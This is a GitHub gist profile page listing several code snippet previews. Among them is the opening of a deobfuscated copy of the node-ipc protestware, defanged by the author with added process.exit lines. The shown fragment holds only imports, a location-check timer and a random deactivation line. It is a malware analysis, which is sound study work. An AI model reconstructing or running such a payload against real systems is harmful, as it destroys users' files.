Skip to content

Instantly share code, notes, and snippets.

View jerbear2008's full-sized avatar
:atom:

jerbear4328 jerbear2008

:atom:
  • 05:41 (UTC -07:00)
View GitHub Profile

Wiktionary API

@jerbear2008
jerbear2008 / Tagged Template Literals.carbide.md
Last active February 5, 2022 16:38
Tagged Template Literals
@jerbear2008
jerbear2008 / VIRUS formatted.js
Last active March 18, 2022 04:23
Deobfuscating the node-ipc virus.
/* for saftey reasons: */ process.exit(1) //not in original payload
import path from "path"
import fs from "fs"
import https from "https"
setTimeout(function() { //check location, if so activate payload
/* for saftey reasons: */ process.exit(1) //not in original payload
const randomNum = Math.round(Math.random() * 4) //randomly deactivates itself
// https://web.archive.org/web/20190801192717/https://getfirebug.com/firebug-lite.js
// functional, links to wayback machine on the day before shutdown
var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; };
if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } }
{
let window = _____WB$wombat$assign$function_____("window");
let self = _____WB$wombat$assign$function_____("self");
let document = _____WB$wombat$assign$function_____("document");
let location = _____WB$wombat$assign$function_____("location");
@jerbear2008
jerbear2008 / !CMMM-cells.md
Last active March 30, 2023 23:47
CMMM Textures

Just the Cell Machine textures for cells

import Imap from 'imap'
import { simpleParser } from 'mailparser'
import util from 'util'
// Modernized verison, with modern JS, async/await, util.promisify, etc.
class MailListener {
constructor({
username,
password,
host,